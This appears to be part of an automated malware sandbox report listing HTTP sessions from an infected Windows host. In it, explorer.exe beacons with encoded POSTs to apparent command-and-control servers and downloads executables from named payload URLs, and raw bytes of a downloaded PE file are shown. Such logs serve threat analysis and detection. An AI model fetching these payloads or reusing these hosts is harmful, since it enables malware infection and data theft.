                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:43.669954062 CET12946INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:43 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    57192.168.2.34986894.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:43.797128916 CET12947OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://wferj.org/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 138
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:43.885927916 CET12947INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:43 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 46 e8 ae 88 70 bc 57 dd 43 df f9 21 87 26 ec c3 91 50 23 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 46I:82OR&:UPJ%9FpWC!&P#c0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    58192.168.2.34986994.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:44.478602886 CET12948OUTGET /files/8474_1641976243_3082.exe HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Host: data-host-coin-8.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:44.543018103 CET12949INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:44 GMT
                                                                                                                                                                                                    Content-Type: application/x-msdos-program
                                                                                                                                                                                                    Content-Length: 373760
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Last-Modified: Wed, 12 Jan 2022 08:30:43 GMT
                                                                                                                                                                                                    ETag: "5b400-5d55e62ba577e"
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6c cb d2 55 28 aa bc 06 28 aa bc 06 28 aa bc 06 36 f8 29 06 31 aa bc 06 36 f8 3f 06 57 aa bc 06 0f 6c c7 06 2b aa bc 06 28 aa bd 06 f5 aa bc 06 36 f8 38 06 11 aa bc 06 36 f8 28 06 29 aa bc 06 36 f8 2d 06 29 aa bc 06 52 69 63 68 28 aa bc 06 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 61 a2 52 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 c2 04 00 00 76 12 00 00 00 00 00 40 a1 02 00 00 10 00 00 00 e0 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 17 00 00 04 00 00 e2 26 06 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 be 04 00 28 00 00 00 00 b0 16 00 10 7b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 17 00 14 1d 00 00 80 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 8f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e8 c1 04 00 00 10 00 00 00 c2 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 bc 9f 11 00 00 e0 04 00 00 18 00 00 00 c6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 69 7a 69 00 00 00 05 00 00 00 00 80 16 00 00 02 00 00 00 de 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 75 72 00 00 00 00 ea 00 00 00 00 90 16 00 00 02 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 77 6f 62 00 00 00 00 93 0d 00 00 00 a0 16 00 00 0e 00 00 00 e2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 7b 00 00 00 b0 16 00 00 7c 00 00 00 f0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 46 00 00 00 30 17 00 00 48 00 00 00 6c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f4 c1 04 00 06 c2 04 00 1a c2 04 00 30 c2 04 00 40 c2 04 00 50 c2 04 00 6c c2 04 00 84 c2 04 00 98 c2 04 00 a8 c2 04 00 c2 c2 04 00 dc c2 04 00 f4 c2 04 00 08
                                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$lU(((6)16?Wl+(686()6-)Rich(PELaR`v@@&({0@8.text `.data@.gizi@.bur@.wob@.rsrc{|@@.reloc4F0Hl@B0@Pl


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    59192.168.2.34987194.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:46.348975897 CET13341OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://jkhktrj.net/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 157
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:46.436677933 CET13342INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:46 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    6192.168.2.34974794.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:58:58.312180042 CET1112OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://qlxnfuhj.net/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 296
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:58:58.394426107 CET1112INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:58:58 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Data Raw: 31 39 0d 0a 14 00 00 00 7b fa f6 1c b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 19{i+,GO0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    60192.168.2.34987294.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:46.548856974 CET13343OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://uiswqsy.com/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 216
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:46.637809038 CET13343INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:46 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Data Raw: 32 39 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c0 d7 10 55 3a 40 a9 fe c2 aa b9 01 ac 52 cc 77 f8 0f 11 91 1d f4 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 29I:82OU:@Rw0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    61192.168.2.349873141.8.194.7480C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:46.778390884 CET13344OUTGET /9.exe HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Host: a0621298.xsph.ru
                                                                                                                                                                                                    Jan 14, 2022 04:59:46.852816105 CET13346INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                    Server: openresty
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:46 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                    Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 6c 65 66 74 2d 73 69 64 65 7b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 3b 68 65 69 67 68 74
                                                                                                                                                                                                    Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-between;-moz-box-pack:justify;-ms-flex-pack:justify;justify-content:space-between;position:relative}.wrapper .content .left-side{display:table;height


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    62192.168.2.34987494.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:47.095720053 CET13405OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://otiidv.com/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 247
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:47.179227114 CET13405INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:47 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    63192.168.2.34987594.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:47.285541058 CET13406OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://adiacegte.com/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 320
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:47.372786045 CET13407INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:47 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Data Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 43 4e c7 3d c2 ec 66 b5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 30I:82OTevCN=fdP0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    64192.168.2.34988094.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:50.576308966 CET17258OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://kxdhsiskb.org/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 196
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:50.670826912 CET17259INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:50 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
